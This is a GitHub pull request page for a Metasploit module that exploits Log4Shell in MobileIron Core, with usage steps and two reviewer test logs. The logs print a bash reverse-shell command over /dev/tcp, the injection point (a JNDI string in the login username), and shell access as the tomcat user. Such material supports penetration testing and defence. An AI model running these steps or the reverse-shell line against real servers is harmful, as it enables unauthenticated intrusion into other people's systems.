Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We鈥檒l occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

MobileIron Core Log4Shell RCE Module (CVE-2021-44228) #16837

Merged
merged 2 commits into from
Aug 2, 2022
Merged

MobileIron Core Log4Shell RCE Module (CVE-2021-44228) #16837

merged 2 commits into from
Aug 2, 2022

Conversation

jbaines-r7
Copy link
Contributor

@jbaines-r7 jbaines-r7 commented Jul 29, 2022
edited by bwatters-r7
Loading

This module exploits MobileIron Core using Log4Shell. The JNDI string is stored in the j_username parameter during a login attempt. Exploitation results in access as the tomcat user. Mandiant noted MobileIron Core has been exploited in the wild.

There is nothing too crazy about this module's implementation. I largely stole from @smcintyre-r7's Ubiquiti Controller and VMware Log4Shell modules. Technically speaking, we could add a bit of a version check in check because you can extract the major.minor version of the target from the login page (/mifs/user/login.jsp). But I opted not too because it seemed like unnecessary work. But, I figured I'd be honest about that detail.

mobileiron_version_login jsp

Ivanti states that MobileIron Core before 11.5 is affected. But we only have access to 11.2 and 10.6, so that's what was tested 馃し

Verification

Follow installation steps listed in the module's documentation.

  • Start msfconsole
  • use exploit/linux/http/mobileiron_core_log4shell
  • set LHOST
  • set RHOSTS
  • set SRVHOST
  • set SRVPORT (optional, but I set it to 1389 so msfconsole doesn't have root privs)
  • run
  • A wild reverse shell appears

PoC Video || GTFO

https://www.youtube.com/watch?v=H9tUXMmvZ34

PCAP || GTFO

mobileiron_core_log4shell.zip

@bwatters-r7 bwatters-r7 self-assigned this Aug 1, 2022
@bwatters-r7
Copy link
Contributor 

msf6 exploit(linux/http/mobileiron_core_log4shell) > show options

Module options (exploit/linux/http/mobileiron_core_log4shell):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   LDIF_FILE                   no        Directory LDIF file path
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.5.132.159     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasplo
                                         it
   RPORT      443              yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local mac
                                         hine or 0.0.0.0 to listen on all addresses.
   SRVPORT    389              yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.101     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux


msf6 exploit(linux/http/mobileiron_core_log4shell) > set verbose true
verbose => true
msf6 exploit(linux/http/mobileiron_core_log4shell) > set srvhost 10.5.135.101
srvhost => 10.5.135.101
msf6 exploit(linux/http/mobileiron_core_log4shell) > set srvport 3389
srvport => 3389
msf6 exploit(linux/http/mobileiron_core_log4shell) > check

[*] Attempting to trigger the jndi callback...
[+] 10.5.132.159:443 - The target is vulnerable.
msf6 exploit(linux/http/mobileiron_core_log4shell) > run

[+] bash -c '0<&202-;exec 202<>/dev/tcp/10.5.135.101/4444;sh <&202 >&202 2>&202'
[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to trigger the jndi callback...
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Client sent unexpected request 2
[*] Command shell session 1 opened (10.5.135.101:4444 -> 10.5.132.159:48700) at 2022-08-01 16:52:55 -0500
[*] Server stopped.

pwd
/
ls
bin
boot
dev
etc
home
lib
lib64
lost+found
media
mi
mnt
mobileiron.com
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
whoami
tomcat

@bwatters-r7
Copy link
Contributor

Restest with changes

[ruby-3.0.2@metasploit-framework](land-16837) tmoose@ubuntu:~/rapid7/metasploit-framework$ git log | head -n 5
commit d71350dfe6b6849d06f4a4e4e4948d5fcdb40717
Author: bwatters-r7 <bwatters-r7@github>
Date:   Tue Aug 2 11:04:13 2022 -0500

    Remove superfluous code and add extra check
[ruby-3.0.2@metasploit-framework](land-16837) tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfconsole -q
[-] No local database connected, meaning some Metasploit features will not be available. A full list of the affected features & database setup instructions can be found here: https://github.com/rapid7/metasploit-framework/wiki/msfdb:-Database-Features-&-How-to-Set-up-a-Database-for-Metasploit
[-] No results from search
msf6 > use exploit/linux/http/mobileiron_core_log4shell 
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/mobileiron_core_log4shell) > set lhost 10.5.135.101
lhost => 10.5.135.101
msf6 exploit(linux/http/mobileiron_core_log4shell) > set rhosts 10.5.132.159
rhosts => 10.5.132.159
msf6 exploit(linux/http/mobileiron_core_log4shell) > set verbose true
verbose => true
msf6 exploit(linux/http/mobileiron_core_log4shell) > set srvhost 10.5.135.101
srvhost => 10.5.135.101
msf6 exploit(linux/http/mobileiron_core_log4shell) > set srvport 3890
srvport => 3890
msf6 exploit(linux/http/mobileiron_core_log4shell) > check

[*] Attempting to trigger the jndi callback...
[+] 10.5.132.159:443 - The target is vulnerable.
msf6 exploit(linux/http/mobileiron_core_log4shell) > run

[+] bash -c '0<&109-;exec 109<>/dev/tcp/10.5.135.101/4444;sh <&109 >&109 2>&109'
[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to trigger the jndi callback...
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Client sent unexpected request 2
[*] Command shell session 1 opened (10.5.135.101:4444 -> 10.5.132.159:33964) at 2022-08-02 11:11:10 -0500
[*] Server stopped.

uname -a
Linux monileiron.example.moose 3.10.0-1062.4.1.el7.x86_64 #1 SMP Fri Oct 18 17:15:30 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
whoami
tomcat

@smcintyre-r7 smcintyre-r7 merged commit a0058c0 into rapid7:master Aug 2, 2022
@smcintyre-r7
Copy link
Contributor

Merged! Thanks alot @bwatters-r7 and @jbaines-r7 !

@smcintyre-r7
Copy link
Contributor

Release Notes

This adds an exploit for MobileIron which is affected by the Log4Shell vulnerability. The result is unauthenticated remote code execution in the context of the web application user.

@bwatters-r7 bwatters-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 2, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@smcintyre-r7 smcintyre-r7 smcintyre-r7 left review comments

Assignees

@bwatters-r7 bwatters-r7

@smcintyre-r7 smcintyre-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
4 participants
@jbaines-r7 @bwatters-r7 @smcintyre-r7 @bcoles